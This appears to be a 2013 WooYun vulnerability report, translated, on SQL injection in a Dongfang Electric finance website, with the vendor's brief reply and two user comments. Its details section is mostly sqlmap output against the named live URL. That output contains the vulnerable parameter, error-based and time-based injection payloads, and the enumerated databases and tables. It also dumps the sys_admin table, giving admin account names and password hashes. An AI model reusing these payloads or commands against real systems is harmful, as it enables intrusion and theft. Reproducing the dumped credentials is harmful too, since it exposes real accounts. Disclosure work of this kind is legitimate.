
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-042140

Title: SQL injection vulnerability on a Dongfang Electric site

Vendor: dongfang.com

Author: lucky

Submitted: 2013-11-06 15:44

Fixed: 2013-12-21 15:45

Published: 2013-12-21 15:45

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-11-06: Details sent to the vendor, awaiting vendor response
2013-11-06: Vendor confirmed; details disclosed to the vendor only
2013-11-16: Details disclosed to core white hats and domain experts
2013-11-26: Details disclosed to regular white hats
2013-12-06: Details disclosed to intern white hats
2013-12-21: Details disclosed to the public

Brief description:

Details:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.decfc.dongfang.com/media/media_List.php?NID=1&Language=GB" --dbs
---
Place: GET
Parameter: NID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: NID=1 AND (SELECT 9454 FROM(SELECT COUNT(*),CONCAT(0x3a76696a3a,(SELECT (CASE WHEN (9454=9454) THEN 1 ELSE 0 END)),0x3a6d77743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Language=GB
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NID=1 AND SLEEP(5)&Language=GB
---
available databases [5]:
[*] information_schema
[*] mysql
[*] php_decfinance
[*] php_decfinance_new
[*] test
Database: php_decfinance
[105 tables]
+----------------------+
| bulletin_class_gb |
| bulletin_gb |
| comment_class_gb |
| comment_gb |
| commodity_class_gb |
| commodity_gb |
| counter |
| culture_class_gb |
| culture_gb |
| currency_type_gb |
| dec_oldnews |
| download_class_gb |
| download_gb |
| ent_culture_class_gb |
| ent_culture_gb |
| faddress |
| farea |
| fbrowser |
| finance_class_gb |
| finance_gb |
| fipone |
| fiptwo |
| fmozilla |
| frefer |
| fscreen |
| fsystem |
| fvisit |
| fweburl |
| gb_content_gb |
| gb_style_gb |
| group_class_GB |
| group_class_gb |
| group_gb |
| headlines |
| infolist |
| information_gb |
| ipinfo |
| ipscope |
| job_class_gb |
| job_demand_gb |
| job_exper_gb |
| job_feelback_gb |
| job_gb |
| job_send_gb |
| link_class_gb |
| logistics_class_gb |
| logistics_gb |
| magazine_class_gb |
| magazine_gb |
| mediasound_gb |
| menu_gb |
| navigation_gb |
| news_class_gb |
| news_feel_back_gb |
| news_gb |
| order_info |
| order_item |
| order_payment_gb |
| orders_gb |
| payment_class_gb |
| plat_class_gb |
| plat_gb |
| policy_class_gb |
| policy_gb |
| pro_base_class_gb |
| pro_base_gb |
| procure_feel_back_gb |
| procure_gb |
| product_class_gb |
| product_discount_gb |
| product_gb |
| project_class_gb |
| project_gb |
| recruit_class_gb |
| recruit_gb |
| report_gb |
| second_class_gb |
| second_gb |
| server_class_gb |
| server_gb |
| societyduty_gb |
| statday |
| statmonth |
| statweek |
| statyear |
| sys_admin |
| sys_levels |
| tech_class_gb |
| tech_gb |
| techinno_class_gb |
| techinno_gb |
| technology_class_gb |
| technology_gb |
| third_class_gb |
| third_gb |
| topic_class_gb |
| topic_gb |
| trading_class_gb |
| trading_gb |
| users_gb |
| video_class_gb |
| video_gb |
| visitor |
| voice_class_gb |
| voice_gb |
+----------------------+
Database: php_decfinance
Table: sys_admin
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| AdminName | varchar(20) |
| AdminPwd | varchar(32) |
| IP | varchar(15) |
| Level_List | varchar(200) |
| RealName | varchar(20) |
+------------+--------------+
Database: php_decfinance
Table: sys_admin
[2 entries]
+-----+----------------------------------+----------+------------+------------+
| IP | AdminPwd | RealName | AdminName | Level_List |
+-----+----------------------------------+----------+------------+------------+
| ... | b04cd7043863bdd572008e0d28ba4814 | ddd | admindecfc | 01 |
| ... | b49282adf74297e8e0aac1501119b075 | decfc | decfchgcw | 99 |
+-----+----------------------------------+----------+------------+------------+

Proof of vulnerability:

Remediation:

Copyright: please credit the source when reposting, lucky@WooYun


Vendor response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2013-11-06 15:48

Vendor reply:

Thank you for notifying us.

Latest status:

None


Vulnerability rating:

Comments

  1. 2013-11-06 18:06 | 浩天, certified white hat ( regular white hat | Rank: 915, vulnerabilities: 79 | on vacation...)

    Rated 5 rank, so you only end up with 1 rank.

  2. 2013-11-06 20:11 | lucky ( regular white hat | Rank: 409, vulnerabilities: 84 | 三人行必有我师焉########################...)

    @浩天 So you know about that too!